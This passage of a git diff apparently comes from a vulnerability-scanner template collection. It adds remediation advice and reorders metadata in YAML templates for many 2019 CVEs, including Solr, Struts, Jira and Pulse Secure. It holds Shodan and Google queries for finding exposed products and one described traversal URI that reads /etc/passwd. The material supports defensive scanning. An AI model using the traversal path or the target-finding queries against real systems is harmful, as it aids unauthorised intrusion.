http/cves/2019/CVE-2019-3799.yaml | 4 +++- http/cves/2019/CVE-2019-3911.yaml | 6 ++++-- http/cves/2019/CVE-2019-3912.yaml | 6 ++++-- http/cves/2019/CVE-2019-3929.yaml | 4 +++- http/cves/2019/CVE-2019-5127.yaml | 4 +++- http/cves/2019/CVE-2019-5418.yaml | 4 +++- http/cves/2019/CVE-2019-5434.yaml | 8 +++++--- http/cves/2019/CVE-2019-6112.yaml | 6 ++++-- http/cves/2019/CVE-2019-6340.yaml | 6 ++++-- http/cves/2019/CVE-2019-6715.yaml | 6 ++++-- http/cves/2019/CVE-2019-6799.yaml | 12 +++++++----- http/cves/2019/CVE-2019-6802.yaml | 8 +++++--- http/cves/2019/CVE-2019-7192.yaml | 8 +++++--- http/cves/2019/CVE-2019-7219.yaml | 4 ++-- http/cves/2019/CVE-2019-7238.yaml | 4 +++- http/cves/2019/CVE-2019-7254.yaml | 4 +++- http/cves/2019/CVE-2019-7255.yaml | 8 +++++--- http/cves/2019/CVE-2019-7256.yaml | 8 +++++--- http/cves/2019/CVE-2019-7275.yaml | 4 +++- http/cves/2019/CVE-2019-7315.yaml | 4 +++- http/cves/2019/CVE-2019-7481.yaml | 4 +++- http/cves/2019/CVE-2019-7543.yaml | 4 +++- http/cves/2019/CVE-2019-7609.yaml | 4 +++- http/cves/2019/CVE-2019-8086.yaml | 8 +++++--- http/cves/2019/CVE-2019-8390.yaml | 6 ++++-- http/cves/2019/CVE-2019-8442.yaml | 6 ++++-- http/cves/2019/CVE-2019-8446.yaml | 6 ++++-- http/cves/2019/CVE-2019-8449.yaml | 6 ++++-- http/cves/2019/CVE-2019-8451.yaml | 6 ++++-- http/cves/2019/CVE-2019-8903.yaml | 6 ++++-- http/cves/2019/CVE-2019-8937.yaml | 6 ++++-- http/cves/2019/CVE-2019-8982.yaml | 4 +++- http/cves/2019/CVE-2019-9041.yaml | 4 +++- http/cves/2019/CVE-2019-9618.yaml | 6 ++++-- http/cves/2019/CVE-2019-9670.yaml | 4 +++- http/cves/2019/CVE-2019-9726.yaml | 4 +++- http/cves/2019/CVE-2019-9733.yaml | 4 +++- http/cves/2019/CVE-2019-9915.yaml | 6 ++++-- http/cves/2019/CVE-2019-9922.yaml | 6 ++++-- http/cves/2019/CVE-2019-9955.yaml | 4 +++- http/cves/2019/CVE-2019-9978.yaml | 6 ++++-- 159 files changed, 574 insertions(+), 280 deletions(-) diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 29547d4b76..aa2e733792 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -6,22 +6,22 @@ info: severity: high description: | Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. + remediation: | + Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. reference: - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ - https://issues.apache.org/jira/browse/SOLR-13669 - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E - remediation: | - Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 epss-score: 0.95869 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* epss-percentile: 0.99213 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 5bf14df652..cc0f48997b 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. + remediation: | + Apply the necessary patches or updates provided by Apache Tomcat to fix the XSS vulnerability. reference: - https://seclists.org/fulldisclosure/2019/May/50 - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ @@ -18,13 +20,13 @@ info: cve-id: CVE-2019-0221 cwe-id: CWE-79 epss-score: 0.01651 - cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* epss-percentile: 0.86008 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat + shodan-query: title:"Apache Tomcat" tags: apache,xss,tomcat,seclists,edb,cve,cve2019 variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index c1c8500cad..e7961787cc 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution. + remediation: | + Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0230 - https://cwiki.apache.org/confluence/display/WW/S2-059 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-0230 cwe-id: CWE-1321 epss-score: 0.92614 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.98622 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 90b5cc6ebb..40815b1fd2 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -5,6 +5,8 @@ info: author: davidmckennirey severity: critical description: Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability. + remediation: | + Apply the latest security patches and updates provided by Kentico CMS to mitigate this vulnerability. reference: - https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/ - https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-10068 cwe-id: CWE-502 epss-score: 0.97358 - cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* epss-percentile: 0.9984 + cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kentico diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 3f1c45f0f7..609742f9a9 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. + remediation: | + Upgrade to Apache HTTP Server version 2.4.40 or later, which includes a fix for this vulnerability. reference: - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd - https://httpd.apache.org/security/vulnerabilities_24.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-10092 cwe-id: CWE-79 epss-score: 0.01582 - cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* epss-percentile: 0.8571 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index a41adf2ad6..a68325b085 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + remediation: | + Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47689 - https://nvd.nist.gov/vuln/detail/CVE-2019-10098 @@ -19,8 +21,8 @@ info: cve-id: CVE-2019-10098 cwe-id: CWE-601 epss-score: 0.08306 - cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* epss-percentile: 0.9354 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index bddf843827..446f68d13b 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + remediation: | + Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: - http://www.mdh-tz.info/ - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* epss-percentile: 0.46935 + cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/timesheet/login.php" vendor: timesheet_next_gen_project product: timesheet_next_gen + google-query: inurl:"/timesheet/login.php" tags: cve,cve2019,timesheet,xss http: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index ef2c47a0a3..395a9d7f07 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + remediation: | + Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. reference: - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/ - http://dev.cmsmadesimple.org/project/files/729 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.00198 - cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* epss-percentile: 0.56887 + cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 vendor: cmsmadesimple diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 678fe55d49..8e9add1cbb 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -5,6 +5,8 @@ info: author: RedTeamBrasil severity: critical description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. + remediation: | + Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-10232 cwe-id: CWE-89 epss-score: 0.21939 - cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* epss-percentile: 0.95827 + cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: teclib-edition diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 5e1d71c203..4d01e7d565 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue. + remediation: | + Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability. reference: - https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505 - http://www.openwall.com/lists/oss-security/2019/09/25/3 @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-10405 cwe-id: CWE-79 epss-score: 0.00572 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* epss-percentile: 0.75075 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:81586312 vendor: jenkins product: jenkins + shodan-query: http.favicon.hash:81586312 tags: cve,cve2019,jenkins http: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index b85924998f..78346a1033 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides. + remediation: | + Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor. reference: - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 - http://www.openwall.com/lists/oss-security/2019/10/23/2 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-10475 cwe-id: CWE-79 epss-score: 0.97301 - cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* epss-percentile: 0.99796 + cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 - framework: jenkins vendor: jenkins product: build-metrics + framework: jenkins tags: cve,cve2019,jenkins,xss,plugin,packetstorm http: diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index aea3a1502e..f085023463 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). reference: - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea - https://wordpress.org/plugins/wp-google-maps/#developers @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-10692 cwe-id: CWE-89 epss-score: 0.9737 - cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9985 + cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: codecabin product: wp_go_maps + framework: wordpress tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan http: diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 69e24fcf69..2fcba58790 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -6,6 +6,8 @@ info: severity: high description: | BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + remediation: | + Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect - https://github.com/rxtur/BlogEngine.NET/commits/master @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-10717 cwe-id: CWE-22 epss-score: 0.0042 - cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* epss-percentile: 0.7095 + cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Blogengine.net" verified: true + max-request: 1 vendor: dotnetblogengine product: blogengine.net + shodan-query: http.html:"Blogengine.net" tags: seclists,cve,cve2019,blogengine,lfi,traversal http: diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index cc4fdc2921..30263c022b 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -5,24 +5,24 @@ info: author: princechaddha severity: critical description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 - remediation: Upgrade mongo-express to version 0.54.0 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 epss-score: 0.97345 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* epss-percentile: 0.99831 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - shodan-query: http.title:"Mongo Express" - framework: node.js vendor: mongo-express_project product: mongo-express + framework: node.js + shodan-query: http.title:"Mongo Express" tags: vulhub,cve,cve2019,mongo,mongo-express,kev http: diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index d33f3812f3..06306fa9b7 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + remediation: | + Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/47301 - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-11013 cwe-id: CWE-22 epss-score: 0.01775 - cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* epss-percentile: 0.86476 + cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: softvelum diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index b38d1eec41..4d25d54ad7 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. + remediation: | + Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing @@ -18,8 +20,8 @@ info: cve-id: CVE-2019-11248 cwe-id: CWE-419,CWE-862 epss-score: 0.74826 - cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* epss-percentile: 0.97731 + cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kubernetes diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 2c4bdcb923..3f3f3a5e34 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. + remediation: | + Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: - https://www.exploit-db.com/exploits/46897 - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 @@ -16,14 +18,14 @@ info: cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.1896 - cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.95583 + cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"pCOWeb" verified: true + max-request: 2 vendor: carel product: pcoweb_card_firmware + shodan-query: http.html:"pCOWeb" tags: pcoweb,xss,carel,edb,cve,cve2019 http: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index e021cdea92..0bfb26a9e5 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access. + remediation: | + Apply the latest security patches and updates provided by Pulse Secure. reference: - https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-11510 cwe-id: CWE-22 epss-score: 0.97289 - cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* epss-percentile: 0.99788 + cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* metadata: max-request: 1 vendor: pulsesecure diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index cd182ab915..e555565250 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. + remediation: | + Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability. reference: - https://github.com/jas502n/CVE-2019-11580 - https://jira.atlassian.com/browse/CWD-5388 @@ -15,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11580 epss-score: 0.97501 - cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* epss-percentile: 0.99963 + cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: crowd + shodan-query: http.component:"Atlassian Jira" tags: packetstorm,kev,cve,cve2019,atlassian,rce http: diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 32f731b520..ad17c123a8 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability. + remediation: | + Apply the necessary security patches or upgrade to a fixed version provided by Atlassian to mitigate this vulnerability. reference: - https://github.com/jas502n/CVE-2019-11581 - https://jira.atlassian.com/browse/JRASERVER-69532 @@ -15,13 +17,13 @@ info: cve-id: CVE-2019-11581 cwe-id: CWE-74 epss-score: 0.97434 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.99907 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2019,atlassian,jira,ssti,rce,kev http: diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 6bc23f90c3..f0358593b5 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -11,6 +11,8 @@ info: request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting. + remediation: | + Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability. reference: - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild - https://wpscan.com/vulnerability/9254 @@ -23,13 +25,13 @@ info: cve-id: CVE-2019-11869 cwe-id: CWE-79 epss-score: 0.00321 - cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* epss-percentile: 0.66852 + cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: yuzopro product: yuzo + framework: wordpress tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss http: diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index c59f7cf742..e9388e9aa5 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -6,22 +6,22 @@ info: severity: high description: | GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. + remediation: | + A patch for this issue was made on 2019-05-30 in GrandNode 4.40. reference: - https://security401.com/grandnode-path-traversal/ - https://grandnode.com - https://github.com/grandnode/grandnode - https://nvd.nist.gov/vuln/detail/CVE-2019-12276 - http://packetstormsecurity.com/files/153373/GrandNode-4.40-Path-Traversal-File-Download.html - remediation: | - A patch for this issue was made on 2019-05-30 in GrandNode 4.40. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-12276 cwe-id: CWE-22 epss-score: 0.96216 - cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* epss-percentile: 0.99307 + cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grandnode diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 89e2a7c560..e4ef3c672d 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Deltek Maconomy 2.2.5. reference: - 